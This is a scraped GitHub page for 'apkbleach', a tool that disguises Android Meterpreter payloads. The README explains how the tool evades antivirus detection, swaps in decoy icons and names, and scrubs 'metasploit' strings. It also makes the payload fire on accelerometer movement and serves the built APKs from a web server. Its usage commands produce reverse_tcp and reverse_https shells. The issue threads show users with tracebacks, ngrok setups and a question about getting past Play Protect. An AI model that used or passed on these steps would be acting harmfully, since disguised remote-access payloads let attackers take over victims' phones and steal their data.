graylagx2 / apkbleach Goto Github PK

Android Payload obfuscation and icon injection tool

License: GNU General Public License v3.0

Shell 1.71% Python 53.01% CSS 2.62% HTML 38.47% Smali 4.19%

apkbleach's Introduction

apkbleach 2.1

About:

This software was developed specifically for Kali-Linux to obfuscate android payloads in attempts to evade detection. This software also automates the process of changing the app icon, changing the app name, signing the apk, aligning the apk and installing or upgrading apktool.

Youtube instructional video:

New Deployment UI feature

Features:

User interface for deployment of payloads
Line by line permissions editing. The software will go through each permission in the manifest and ask if you want to delete it.
Stealth option. This executes the payload off the devices accelerometer instead of on open. This option also allows you to choose how many sessions you want spawned of exploit.
Custom icon injection. This allows users to modify the app icon that appears on the home screen of a android device. You can choose from a icon apkbleach provides or you can supply your own. Apkbleach will do all the work for you.
Renames the application to the name you put chose as the ouput file
Scrubs the entire application of any mentions of the name "metasploit" , "stage" or "payload". There are a lot by the way. sending security testing with an app that contains the name metasploit is just funny :-)
Adds padnops to PAYLOAD
Signs apk with jarsigner. msfenom produces unsigned apps
Zip aligns apk
Apktool upgrade feature. If the software detects youre using apktool version 2.4.1-dirty which is Kali's package maintainers version it will ask if you want to replace it with the lates version frfom ibot peaches. This is a good idea because it conflicts with the msfvenom -x option and throws a version number error. Not to mention the problems it has given users in the past.

Usage:

apkbleach -g android/meterpreter/reverse_https LHOST=Address LPORT=port -s 3 -i BLEACH_settings --edit-permissions -o /var/www/html/payload.apk

apkbleach -g android/meterpreter/reverse_tcp LHOST=address LPORT=port -s 3 --edit-permissions --deploy-all

 apkbleach --list-payloads

 apkbleach --list-icons

 apkbleach --clear-cache

optional arguments:

  -h, --help            show this help message and exit

  -g [PAYLOAD] [LHOST] [LPORT]
                    Generates a payload
                    
  -s [number of sessions to spawn 1-5]
                    Executes payload on accelerometer activity instead of on open
                    
  -i [BLEACH_icon..] or [path/to/custom/icon]
                    Injects an icon
                    
  -o [output/path/for/file.apk]
                    Path to output apk
                    
  --edit-permissions    Enables permission editing in apk's manifest
  
  --deploy-all          Deploys each available icon as a payload with the apache2 server with a web interface

  --list-payloads       List available icons

  --list-icons          List available icons

  --clear-cache         Allows prompt whether to keep package maintainers version apktool

Install instructions:

After cloning or downloading the repository cd into the apkbleach directory and run run install.sh

cd apkbleach
bash install.sh

cd apkbleach
chmod +x install.sh
./install.sh

apkbleach's People

Contributors

Stargazers

Watchers

apkbleach's Issues

APK build only 10kb and no install

Hi Every dependency is installed and apkbleach has installed correctly and build apk with no error
I have tried lhost and lport with no-ip and also with plain IP address and both give me a 10kb APK file which does not install on Android
What could be the problem ?

Why isn't this working???

                           ____  ____  __  _  ____   _        ___   ____    __  __ __
                          /    T|    \|  l/ ]|    \ | T      /  _] /    T  /  ]|  T  T
                         Y  o  ||  o  )  ' / |  o  )| |     /  [_ Y  o  | /  / |  l  |
                         |     ||   _/|    \ |     T| l___ Y    _]|     |/  /  |  _  |
                         |  _  ||  |  |     Y|  O  ||     T|   [_ |  _  /   \_ |  |  |
                         |  |  ||  |  |  .  ||     ||     ||     T|  |  \     ||  |  |
                         l__j__jl__j  l__j\_jl_____jl_____jl_____jl__j__j\____jl__j__j

                                            Version: 2.0   Author: graylagx2

Payload generated [*]

Apk decompiled [*]

                                        Permissions editor [*]

Traceback (most recent call last):
File "/usr/local/bin/apkbleach", line 33, in
sys.exit(load_entry_point('apkbleach', 'console_scripts', 'apkbleach')())
File "/ApkBleach/src/apkbleach/main.py", line 64, in main
start.bleach_apk()
File "/ApkBleach/src/apkbleach/bleach.py", line 241, in bleach_apk
with open(f'{self.decompiled_path}/AndroidManifest.xml', 'r+') as manifest:
FileNotFoundError: [Errno 2] No such file or directory: '/ApkBleach/src/apkbleach/res/Cache/Decompiled/AndroidManifest.xml'
┌──(superuser㉿DESKTOP-BNOJMEM)-[~]
└─$

session stuck on sending stage

after following your video-tutorial, i was not able to make a connection with the "victim".
I'm testing it on my local network. when installing the apk, my msfconsole got in the sending stage and after that
nothing happened. I retried it multiple times but it didn't work. Do you have any idea what could cause the problem?
Thank you in advance.

Error while executing program

Payload generated [*]

Apk decompiled [*]

Traceback (most recent call last):
File "/usr/local/bin/apkbleach", line 33, in
sys.exit(load_entry_point('apkbleach', 'console_scripts', 'apkbleach')())
File "/home/muhammad/ApkBleach/src/apkbleach/main.py", line 64, in main
start.bleach_apk()
File "/home/muhammad/ApkBleach/src/apkbleach/bleach.py", line 352, in bleach_apk
for edit_line in fileinput.input([f'{self.decompiled_path}/res/values/strings.xml'], inplace=True):
File "/usr/lib/python3.9/fileinput.py", line 249, in next
line = self._readline()
File "/usr/lib/python3.9/fileinput.py", line 343, in _readline
os.rename(self._filename, self._backupfilename)
FileNotFoundError: [Errno 2] No such file or directory: '/home/muhammad/ApkBleach/src/apkbleach/res/Cache/Decompiled/res/values/strings.xml' -> '/home/muhammad/ApkBleach/src/apkbleach/res/Cache/Decompiled/res/values/strings.xml.bak'

The apk is not getting installed ?

I have followed the instructions and the apk has been generated successfully, When I tried to install the apk it is not getting installed

Mobile : Android 10

How to fix this issue ?

Edit : For setting up LHOST and LPORT, I have added the ngrok domain and port.

'NoneType' object is not subscriptable

It seems to be running correctly but it displays "'NoneType' object is not subscriptable" at the beginning

Apk parse error

I can generate an apk with the payload using apkbleach, but I cannot install this apk in any android phone.
I get Parse Error

There was a problem parsing the package.

Tried different android versions

No such file or directory: strings.xml and AndroidManifest.xml

Instalation :

sudo apt-get install python3-pip
cd apkbleach
chmod +x install.sh
./install.sh

Collecting argparse
  Using cached argparse-1.4.0-py2.py3-none-any.whl (23 kB)
Requirement already satisfied: colorama in /usr/lib/python3/dist-packages (from apkbleach==2.1) (0.4.4)
Requirement already satisfied: pillow in /usr/lib/python3/dist-packages (from apkbleach==2.1) (8.4.0)
Requirement already satisfied: pyfiglet==0.8.post1 in /usr/local/lib/python3.9/dist-packages (from apkbleach==2.1) (0.8.post1)
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from apkbleach==2.1) (2.25.1)
Installing collected packages: argparse, apkbleach
  Attempting uninstall: apkbleach
    Found existing installation: apkbleach 2.1
    Can't uninstall 'apkbleach'. No files were found to uninstall.
  Running setup.py develop for apkbleach
Successfully installed apkbleach argparse-1.4.0

apkbleach -g android/meterpreter/reverse_tcp LHOST=11.11.11.11 LPORT=4444 -o file.apk :

Traceback (most recent call last):                                                                                                                                    
  File "/usr/local/bin/apkbleach", line 33, in <module>                                                                                                               
    sys.exit(load_entry_point('apkbleach', 'console_scripts', 'apkbleach')())                                                                                         
  File "/home/dieg/ApkBleach/src/apkbleach/__main__.py", line 64, in main                                                                                             
    start.bleach_apk()                                                                                                                                                
  File "/home/dieg/ApkBleach/src/apkbleach/bleach.py", line 352, in bleach_apk                                                                                        
    for edit_line in fileinput.input([f'{self.decompiled_path}/res/values/strings.xml'], inplace=True):                                                               
  File "/usr/lib/python3.9/fileinput.py", line 249, in __next__                                                                                                       
    line = self._readline()                                                                                                                                           
  File "/usr/lib/python3.9/fileinput.py", line 343, in _readline                                                                                                      
    os.rename(self._filename, self._backupfilename)                                                                                                                   
FileNotFoundError: [Errno 2] No such file or directory: '/home/lol/ApkBleach/src/apkbleach/res/Cache/Decompiled/res/values/strings.xml' -> '/home/lol/ApkBleach/src/apkbleach/res/Cache/Decompiled/res/values/strings.xml.bak'

apkbleach -g android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -s 3 --edit-permissions --deploy-all :

Traceback (most recent call last):                                                                                                                                    
  File "/usr/local/bin/apkbleach", line 33, in <module>                                                                                                               
    sys.exit(load_entry_point('apkbleach', 'console_scripts', 'apkbleach')())                                                                                         
  File "/home/lol/ApkBleach/src/apkbleach/__main__.py", line 64, in main                                                                                             
    start.bleach_apk()                                                                                                                                                
  File "/home/lol/ApkBleach/src/apkbleach/bleach.py", line 241, in bleach_apk                                                                                        
    with open(f'{self.decompiled_path}/AndroidManifest.xml', 'r+') as manifest:                                                                                       
FileNotFoundError: [Errno 2] No such file or directory: '/home/lol/ApkBleach/src/apkbleach/res/Cache/Decompiled/AndroidManifest.xml'

Problem installation

Hello mate.
I am facing problem in installation.

I am getting this after cloning repository:

apkbleach -h 127 ⨯
Traceback (most recent call last):
File "/usr/local/bin/apkbleach", line 33, in
sys.exit(load_entry_point('apkbleach', 'console_scripts', 'apkbleach')())
File "/usr/local/bin/apkbleach", line 25, in importlib_load_entry_point
return next(matches).load()
File "/usr/lib/python3.9/importlib/metadata.py", line 77, in load
module = import_module(match.group('module'))
File "/usr/lib/python3.9/importlib/init.py", line 127, in import_module
return _bootstrap._gcd_import(name[level:], package, level)
File "", line 1030, in _gcd_import
File "", line 1007, in _find_and_load
File "", line 986, in _find_and_load_unlocked
File "", line 680, in _load_unlocked
File "", line 790, in exec_module
File "", line 228, in _call_with_frames_removed
File "/root/ApkBleach/src/apkbleach/main.py", line 8, in
from .bleach import ApkBleach
File "/root/ApkBleach/src/apkbleach/bleach.py", line 8, in
from argparse import argparse, RawTextHelpFormatter
ImportError: cannot import name 'argparse' from 'argparse' (/usr/lib/python3.9/argparse.py)

Can you help me??

Thanks!

Contact developer

hello, I have some questions about the program, would it be possible to have something to contact the developer please ?

An error occurred during package analysis

Following the recomendewd usage in the description with ngrok, the apk is generated, but when i try to install it on the android(6) , it says An error occurred during package analysis.

apkbleach -g android/meterpreter/reverse_tcp LHOST=ngrok_host LPORT=ngrok_port -s 3 -i BLEACH_settings --edit-permissions -o tst.apk
output :

      
                                                      Version: 2.0   Author: graylagx2                                                                    
                                                                                                                                                                    
Payload generated [*]                                                                                                                                               
                                                                                                                                                                    
Apk decompiled [*]                                                                                                                                                  
                                                                                                                                                                    
Apk bleached [*]                                                           ons editor [*]                                                                           
                                                                                                                                                                    
Icon injected [*]                                                                                                                                                   
                                                                           mission.WAKE_LOCK                                                                        
Rebuilding apk [|]                                                         rmission.SEND_SMS                                                                        
Apk rebuilt [*]                                                                                                                                                     
Choose [y/n] the default is [n]:                                                                                                                                    
                                                                                                                                
[Complete]                                                                                                                                                          
                                                                       Apk saved as: tst.apk

Feature suggestion

The generated apk is great.
However, I still hope it can support injecting payload to custom apk.
The payload will be more "normal" in people's eyes!!!

Quick question

Does this method bypass play protect I'm going to test it out in my android device as soon as I get the chance. Im running os 12 from metro PCs

Can you send me some links to other methods of obfuscation I'm a little rusty and I appreciate any help I can get thanks

graylagx2 / apkbleach Goto Github PK

apkbleach's Introduction

apkbleach 2.1

apkbleach's People

Contributors

Stargazers

Watchers

Forkers

apkbleach's Issues

Recommend Projects

Recommend Topics

Recommend Org

Jobs